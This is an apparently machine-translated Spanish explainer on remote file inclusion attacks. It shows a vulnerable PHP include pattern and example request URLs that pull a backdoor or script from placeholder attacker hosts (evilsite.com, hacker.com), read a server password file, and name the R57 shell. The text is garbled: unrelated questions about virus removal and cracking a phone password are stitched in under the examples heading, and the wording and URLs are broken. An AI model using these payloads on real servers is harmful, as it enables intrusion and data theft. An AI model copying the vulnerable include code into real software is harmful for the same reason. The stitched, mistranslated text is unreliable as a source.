La inclusión remota de archivos (RFI) es un ataque dirigido a vulnerabilidades en aplicaciones web que hacen referencia dinámica a scripts externos. El objetivo del autor es explotar la función de referencia en una aplicación para cargar malware (por ejemplo, shells de puerta trasera) desde una URL remota ubicada dentro de un dominio diferente.
EJEMPLOS DE INCLUSIÓN DE ARCHIVO REMOTO
Para ilustrar cómo funcionan las penetraciones de RFI, considere estos ejemplos:
- Mi computadora ha sido infectada con un virus. Cada vez que inicio sesión, dice "¡Valide su licencia de WinPC!" Creo que es Windi.exe. ¿Cómo lo elimino?
- ¿El virus entra en el teléfono mientras descarga algo de la fuente conocida?
- ¿Cómo puedo romper la contraseña de un teléfono ITEL?
- ¿Tener un título aumenta las posibilidades de obtener un trabajo en hacking ético / pruebas de penetración?
- ¿Qué se debe hacer con respecto al malware recurrente Security.hijack? ¿Qué tan grave es esta amenaza?
1. Una página JSP contiene esta línea de código: <jsp: include page = ””> puede manipularse con la siguiente solicitud: Page1.jsp? ParamName = / WEB-INF / DB / contraseña.
Procesar la solicitud revela el contenido del archivo de contraseña al perpetrador.
2. Una aplicación web tiene una declaración de importación que solicita contenido de una dirección URL, como se muestra aquí: <c: import url = "”>.
Si no se desinfecta, se puede usar la misma declaración para la inyección de malware.
Por ejemplo: Page2.jsp? Conf = https: //evilsite.com/attack.js.
3. Los ataques RFI a menudo se inician manipulando los parámetros de solicitud para referirse a un archivo malicioso remoto.
Por ejemplo, considere el siguiente código:
$ incfile = $ _REQUEST [“archivo”]; include ($ incfile. “. php”);
Aquí, la primera línea extrae el valor del parámetro del archivo de la solicitud HTTP, mientras que la segunda línea usa ese valor para establecer dinámicamente el nombre del archivo. En ausencia de una desinfección adecuada del valor del parámetro del archivo, este código puede ser explotado para cargas de archivos no autorizadas.
Por ejemplo, esta cadena de URL http://www.example.com/vuln_page… una referencia externa a un archivo de puerta trasera almacenado en una ubicación remota (http://www.hacker.com/backdoor_s….)
Una vez cargado en la aplicación, esta puerta trasera se puede usar más tarde para secuestrar el servidor subyacente o acceder a la base de datos de la aplicación.
La carcasa trasera R57 es una opción popular para ataques RFI
Visite Imperva Incapsula y Hacker Nucleus – Ethical Hacking, Hacker News para obtener más tutoriales de piratería y noticias de hackers.